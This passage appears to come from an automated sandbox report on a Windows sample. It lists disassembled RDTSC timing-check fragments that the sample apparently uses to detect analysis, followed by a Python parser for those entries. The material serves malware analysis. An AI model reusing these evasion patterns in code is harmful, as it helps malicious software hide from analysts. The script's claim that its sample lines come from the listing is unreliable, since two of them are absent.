                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4C2F second address: CF4C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9228h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4ED9 second address: CF4F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF0165h 0x00000009 popad 0x0000000a jnp 00007FB97CFF016Fh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB97CFF0169h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4F2E second address: CF4F48 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB97CFE9216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB97CFE921Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4F48 second address: CF4F56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FB97CFF0156h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5259 second address: CF5275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FB97CFE921Dh 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007FB97CFE9216h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5275 second address: CF5291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFF0166h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF56B2 second address: CF56BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF56BB second address: CF56BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF56BF second address: CF56ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007FB97CFE9216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB97CFE9221h 0x00000011 popad 0x00000012 pushad 0x00000013 jbe 00007FB97CFE921Ch 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3F7B second address: CF3F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67F97 second address: C67F9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F631 second address: D1F636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F8E4 second address: D1F8F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F8F6 second address: D1F8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24515 second address: D24526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnl 00007FB97CFE9216h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2836B second address: D28371 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28371 second address: D28376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27682 second address: D27686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29B26 second address: D29B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB97CFE9216h 0x0000000a jmp 00007FB97CFE921Eh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29B3F second address: D29B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFF015Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29B55 second address: D29B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D312EC second address: D312F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB97CFF0156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D312F8 second address: D3131A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB97CFE9218h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d ja 00007FB97CFE922Ch 0x00000013 pushad 0x00000014 jnp 00007FB97CFE9216h 0x0000001a jng 00007FB97CFE9216h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31759 second address: D31765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31765 second address: D317A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007FB97CFE922Ah 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31926 second address: D3192C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3192C second address: D31936 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB97CFE9216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31936 second address: D31956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB97CFF0167h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31956 second address: D3195C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31D65 second address: D31D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31D6A second address: D31D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB97CFE9216h 0x0000000a jo 00007FB97CFE9216h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32166 second address: D3216B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3216B second address: D32173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32173 second address: D32177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32177 second address: D3219A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9228h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30E2B second address: D30E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FB97CFF015Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30E3D second address: D30E5B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB97CFE9229h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D384FB second address: D3850E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FB97CFF015Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3850E second address: D38514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38514 second address: D38539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB97CFF0167h 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38539 second address: D3854E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFE9221h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3886A second address: D3886E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3886E second address: D38894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FB97CFE9234h 0x0000000c jmp 00007FB97CFE9228h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38894 second address: D3889C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3889C second address: D388A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB97CFE9216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D478B9 second address: D478BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47406 second address: D47427 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9227h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47427 second address: D4742D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4742D second address: D47449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FB97CFE9216h 0x0000000c popad 0x0000000d jmp 00007FB97CFE921Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D475B0 second address: D475BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FB97CFF0156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B9DE second address: D4B9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B9E3 second address: D4B9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB97CFF0165h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B9FC second address: D4BA02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B590 second address: D4B594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B594 second address: D4B5C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE9228h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007FB97CFE9216h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B5C0 second address: D4B5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D593ED second address: D59407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE9222h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C27D second address: D5C288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FB97CFF0156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C288 second address: D5C28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D643F9 second address: D643FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63011 second address: D63027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007FB97CFE9221h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63125 second address: D63129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63129 second address: D6315E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB97CFE9216h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007FB97CFE9216h 0x00000013 pop eax 0x00000014 jl 00007FB97CFE9235h 0x0000001a jmp 00007FB97CFE9229h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6346B second address: D63470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63470 second address: D6347C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB97CFE921Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D635EC second address: D635F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63792 second address: D6379E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6412F second address: D64135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64135 second address: D6417A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB97CFE9216h 0x00000008 jmp 00007FB97CFE9228h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FB97CFE921Fh 0x00000017 jl 00007FB97CFE9218h 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 jne 00007FB97CFE9216h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D76CBB second address: D76CC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D866AF second address: D866B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D866B4 second address: D866C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB97CFF015Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D866C4 second address: D866C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8625F second address: D86263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96101 second address: D96117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Ch 0x00000007 jo 00007FB97CFE9216h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D963E4 second address: D963E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D963E8 second address: D963EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96552 second address: D96558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96558 second address: D9655E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96AB8 second address: D96AC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C0C second address: D96C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FB97CFE9216h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9871E second address: D98735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF0162h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99F76 second address: D99F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE921Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99F84 second address: D99F89 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9CE27 second address: D9CE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB97CFE921Bh 0x0000000d pop edx 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnc 00007FB97CFE921Ch 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007FB97CFE9223h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push edi 0x00000024 pushad 0x00000025 push eax 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E3BC second address: D9E3EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB97CFF0173h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007FB97CFF015Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54102EE second address: 54102FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54102FF second address: 5410305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410305 second address: 5410309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410309 second address: 5410365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FB97CFF0164h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov esi, 4EA6FC4Dh 0x00000017 movzx esi, bx 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007FB97CFF0165h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007FB97CFF0163h 0x0000002b pop ecx 0x0000002c mov bh, 4Ch 0x0000002e popad 0x0000002f rdtsc
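Each interceptor entry above is one instruction stream between two rdtsc reads, and the second address of one entry is usually the first address of the next, so the whole list is a handful of timing checks smeared across many reads. As an added example, not part of the Joe Sandbox report, the following Python script parses lines in exactly that format, links entries into chains by their addresses, and separates stack shuffling (push/pop, pushad/popad) and branches from the instructions that do real work between the two reads. The three sample lines are copied from the entries above; the padding/payload split is my own classification, not the sandbox's.

```python
import re
from dataclasses import dataclass, field

# Three entries copied from the "RDTSC instruction interceptor" evidence in this report:
# two that chain (D1E3F3 -> D1E3F7 -> D1E407) and carry only padding, and one (D9CE27)
# that does real work between the two reads.
SAMPLE_LINES = [
    "Source: C:\\Users\\user\\Desktop\\file.exe RDTSC instruction interceptor: First address: D1E3F3 second address: D1E3F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    "Source: C:\\Users\\user\\Desktop\\file.exe RDTSC instruction interceptor: First address: D1E3F7 second address: D1E407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FB97CFE9216h 0x00000010 rdtsc",
    "Source: C:\\Users\\user\\Desktop\\file.exe RDTSC instruction interceptor: First address: D9CE27 second address: D9CE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB97CFE921Bh 0x0000000d pop edx 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnc 00007FB97CFE921Ch 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007FB97CFE9223h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push edi 0x00000024 pushad 0x00000025 push eax 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc",
]

HEADER_RE = re.compile(
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions: (?P<body>.*)$"
)
# Every instruction in the stream is prefixed with its byte offset, e.g. "0x0000000e mov eax, ...".
OFFSET_RE = re.compile(r"\s*0x[0-9a-fA-F]{8}\s+")

STACK_OPS = {"push", "pop", "pushad", "popad"}
BRANCH_RE = re.compile(r"^j[a-z]{1,3}$")  # jmp and the jcc family (jc, jnc, jg, jng, jbe, ...)


@dataclass
class RdtscPair:
    first: int            # address of the first rdtsc
    second: int           # address of the second rdtsc
    instructions: list    # full stream, including both rdtsc
    payload: list = field(default_factory=list)  # non-padding, non-branch instructions in between


def parse_line(line):
    """Parse one interceptor entry and classify what sits between the two rdtsc reads."""
    m = HEADER_RE.search(line)
    if not m:
        raise ValueError("not an RDTSC interceptor line")
    instrs = [t.strip() for t in OFFSET_RE.split(m.group("body")) if t.strip()]
    if len(instrs) < 2 or instrs[0] != "rdtsc" or instrs[-1] != "rdtsc":
        raise ValueError("expected the stream to start and end with rdtsc")
    pair = RdtscPair(int(m.group("first"), 16), int(m.group("second"), 16), instrs)
    for ins in instrs[1:-1]:
        mnemonic = ins.split()[0]
        if mnemonic in STACK_OPS or BRANCH_RE.match(mnemonic):
            continue  # register save/restore and opaque jumps: padding around the timing read
        pair.payload.append(ins)
    return pair


def chains(pairs):
    """Group consecutive entries whose second address is the next entry's first address.
    One chain is one timing check stretched over several rdtsc reads."""
    result = []
    for p in pairs:
        if result and result[-1][-1].second == p.first:
            result[-1].append(p)
        else:
            result.append([p])
    return result


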